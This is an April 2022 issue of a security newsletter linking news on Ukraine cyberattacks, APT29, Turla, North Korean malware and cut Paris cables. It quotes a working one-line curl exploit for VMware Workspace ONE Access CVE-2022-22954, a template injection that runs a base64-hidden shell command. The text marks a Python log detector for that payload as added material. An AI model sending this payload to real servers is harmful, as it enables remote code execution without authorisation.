the grugq's newsletter

April 28, 2022

This story about cables cut in France is going to be interesting to follow.

Arthur P.B. Laudrain (@APB_Laudrain), 9:51 AM ∙ Apr 27, 2022:
Major #internet cables physically cut at multiple places in Paris throughout the night. Some ISPs experiencing #outage over the country, increased latency for others. See for instance @netalisfr status.netalis.fr/issue/de7d81ed…

Lots of attacks in Ukraine, apparently.

Dmitry Smilyanets (@ddd1ms), 4:26 PM ∙ Apr 27, 2022:
According to the Computer Emergency Response Team of Ukraine, the country has recorded 802 cyberattacks since Russia invaded the country earlier this year. That compares to just 362 documented attacks during the same time last year, CERT-UA said.
[therecord.media] A deeper look at hacking groups and malware targeting Ukraine: Ukraine’s main cybersecurity incident response team released a list on Friday of the five most persistent hacking groups attacking Ukraine’s critical infrastructure.

Oh boy…

mtanji (@mtanji), 3:53 PM ∙ Apr 27, 2022:
I'm trying to think of how they could have done worse...nope, think they nailed it.
[taskandpurpose.com] The Air Force is trusting the internet to name its ridiculous new cybersecurity mascot: The U.S. Air Force has decided to ask the internet to help it name its cybersecurity mascot. What could possibly go wrong?

Mandiant report linking the SolarWinds hack to APT29.

https://www.mandiant.com/resources/unc2452-merged-into-apt29


Lots of Russian cyber activity linked to Ukraine, and more specifically to military actions. Here’s the report:

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

Learn you some mobile phone security.

LaForge (@LaF0rge), 5:34 PM ∙ Apr 27, 2022:
If you ever want to manually go through the steps that happen when a SIM card is authenticated by 3G/4G/5G networks, see osmocom.org/projects/pysim… for a walkthrough using osmo-auc-gen and pySim. #gsm #cellular #osmocom
[osmocom.org] Manually Testing USIM Authentication - pySim - Open Source Mobile Communications

PoC exploit for VMware Workspace ONE Access (CVE-2022-22954). It fits in a tweet. Those are always cool.

wvu (@wvuuuuuuuuuuuuu), 12:41 AM ∙ Apr 28, 2022:
Exploit for VMware Workspace ONE Access CVE-2022-22954:
curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
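The one-liner above is a FreeMarker server-side template injection: the deviceUdid parameter is rendered as a template, `?new()` instantiates `freemarker.template.utility.Execute`, and the bash brace-expansion plus base64 stage hides the real command. The check a defender wants is whether that shape has hit their own logs. What follows is an added example, not code from the tweet, the newsletter, or VMware: it scans a constructed Apache-style access log for requests to the endpoint the tweet names, pulls the template expression out of deviceUdid, and peels both obfuscation layers back to the command. The log format, the sample IP addresses and the hypothetical helper names are all assumptions; the endpoint, parameter and payload are copied from the tweet.

```python
"""Detect CVE-2022-22954-style FreeMarker SSTI probes in a web access log.

Added example for illustration; the log lines are constructed and the
helper names are not from any product or from the original tweet.
"""
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

VULN_PATH = "/catalog-portal/ui/oauth/verify"  # endpoint hit by the PoC

# First argument handed to FreeMarker's Execute object:
#   ${"freemarker.template.utility.Execute"?new()("<command>")}
EXECUTE_RE = re.compile(
    r'\$\{\s*"freemarker\.template\.utility\.Execute"\s*\?new\(\)\s*'
    r'\("((?:[^"\\]|\\.)*)"\)'
)
# The tweet's bash obfuscation: {echo,<base64>} piped into {base64,-d}
B64_STAGE_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}")
# Minimal combined-log parser (assumed format, not Workspace ONE's own)
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def extract_template_expr(target: str) -> Optional[str]:
    """Return the FreeMarker expression carried in deviceUdid, or None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so we see the same text the template engine saw
    for value in parse_qs(parts.query, keep_blank_values=True).get("deviceUdid", []):
        if "${" in value and "?new(" in value:
            return value
    return None


def recover_command(expr: str) -> Optional[str]:
    """Undo the two layers of the PoC: the Execute call, then the base64 stage."""
    m = EXECUTE_RE.search(expr)
    if not m:
        return None
    shell_cmd = m.group(1)
    stage = B64_STAGE_RE.search(shell_cmd)
    if stage:
        try:
            return base64.b64decode(stage.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: malformed base64
            pass
    return shell_cmd  # no base64 stage, the shell command is already plain


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Return (source_ip, timestamp, recovered_command) for each PoC-shaped request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        expr = extract_template_expr(m["target"])
        if expr is not None:
            hits.append((m["src"], m["ts"], recover_command(expr)))
    return hits


# Payload exactly as in the tweet; urlencode reproduces what curl --data-urlencode sends.
PAYLOAD = '${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'


def build_poc_target() -> str:
    """Request target as it would appear in the log for the tweet's curl command."""
    return VULN_PATH + "?" + urlencode({"error": "", "deviceUdid": PAYLOAD})


# Constructed sample log: one benign call to the endpoint, one PoC, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Apr/2022:00:41:12 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=abc123 HTTP/1.1" 200 512',
    f'198.51.100.9 - - [28/Apr/2022:00:41:15 +0000] "GET {build_poc_target()} HTTP/1.1" 200 97',
    '203.0.113.7 - - [28/Apr/2022:00:42:01 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for src, ts, cmd in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {src} -> {cmd!r}")
```

The detector keys on the endpoint plus a `${…?new(…}` template expression rather than on the literal base64 blob, so a re-encoded command or a different Execute argument still trips it; the base64 recovery is a convenience for triage, not the match condition.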

Couple of things here. Firstly, great thread. Secondly, the concept of stupid-proofing equipment and tools to ensure that bad users can’t do the wrong thing… that’s powerful. It’s partially what mobile phones do for security: so many attack vectors don’t exist because they’re impossible within the constraints of the device.

Trent Telenko (@TrentTelenko), 7:43 PM ∙ Apr 27, 2022:
Missile container thread 🧵 note the wooden boxes used to move Russian Kornet large vehicle anti-tank missiles. You can learn a lot about real history versus 'narratives' by paying attention to them. This thread will demonstrate why that is. 1/
Quoting OSINTtechnical (@Osinttechnical): Kherson Oblast, abandoned Russian BTR-D, note the Kornet ATGM ammunition https://t.co/sIbwrUvIfN

The report he mentions is here:

https://apps.dtic.mil/sti/citations/ADA259704

News these days can be a little bit too psychedelic sometimes.

H I Sutton (@CovertShores), 8:12 PM ∙ Apr 27, 2022:
***BREAKING***
Evidence #Russian Navy trained dolphins deployed to entrance of Sevastopol Harbor during #Ukraine war. You heard it here first. First found in low-resolution Sentinel 2 imagery. Thx for help from @COUPSURE and unnamed others
[news.usni.org] Trained Russian Navy Dolphins are Protecting Black Sea Naval Base, Satellite Photos Show: Russia has deployed trained dolphins during its invasion of Ukraine to protect a Black Sea naval base, USNI News has learned. The Russian Navy has placed two dolphin pens at the entrance to Sevastopol harbor, sheltered just inside a sea wall. The pens were moved there in February, around the time of…

-

There’s a cyber war on. No, the other one.

Stairwell (@InsideStairwell), 10:42 PM ∙ Apr 26, 2022:
@silascutler, Stairwell principal reverse engineer, shares intel about #GOLDBACKDOOR, #APT37, and the Democratic People's Republic of Korea's history of cyber operations as a key means of supporting the regime.
[bit.ly] North Korean Hackers Target Journalists with GOLDBACKDOOR Malware: Researchers have uncovered a new campaign by a North Korean-backed hacking group targeting journalists covering the country.

-

More Turla.

J. A. Guerrero-Saade (@juanandres_gs), 12:32 AM ∙ Apr 28, 2022:
This didn't get nearly enough attention so I'm bumping @hatr's amazing reporting on the Turla -> Ryazan connection. Our best to Vlad, Urik, and Gilg!
[interaktiv.br.de] The Elite Hackers of the FSB: For almost two decades, hackers with Snake have been forcing their way into government networks. Who they work for, though, has always been a matter of pure speculation. But reporters with the German public broadcasters BR and WDR have discovered some clues, and they lead to Russia.

-

A mention of the value of the satellite comms takedown, which keeps being dismissed by many cyberwar analysts.

David Patrikarakos (@dpatrikarakos), 1:12 PM ∙ Apr 27, 2022:
"I want to say one thing: @elonmusk's Starlink is what changed the war in #Ukraine's favour. #Russia went out of its way to blow up all our comms. Now they can't. Starlink works under Katyusha fire, under artillery fire. It even works in Mariupol."

-

Here are the videos from Enigma 2022.

Enigma Conference (@enigmaconf), 7:34 PM ∙ Apr 27, 2022:
The videos from Enigma 2022 are now posted on the conference program page, and are freely available to watch thanks to USENIX's open access policy: bit.ly/enigma2022prog #enigma2022
[bit.ly] Enigma 2022 Conference Program: Enigma 2022 will take place February 1–3, 2022, at the Hyatt Regency Santa Clara in Santa Clara, CA, USA. Enigma centers on a single track of engaging talks covering a wide range of topics in security and privacy. Our goal is to clearly explain emerging threats and defenses in the growing intersecti…

Awesome, if true.

https://www.wired.com/story/north-korean-phone-jailbreakers/

A valid point.

Ian Miers (@secparam), 4:24 AM ∙ Apr 28, 2022:
So @Snowden participated in the original Zcash set up ceremony. How did he go about getting/storing secure hardware? Peter Todd had his ninja alarm (a chair against the door), to guard against whimsical spies. But Snowden was, at least plausibly, under actual FSB surveillance.

For what it’s worth, this exists. Not the sort of thing that floats my boat, but I’d be remiss to ignore it.

https://www.whitehouse.gov/briefing-room/statements-releases/2022/04/28/fact-sheet-united-states-and-60-global-partners-launch-declaration-for-the-future-of-the-internet/
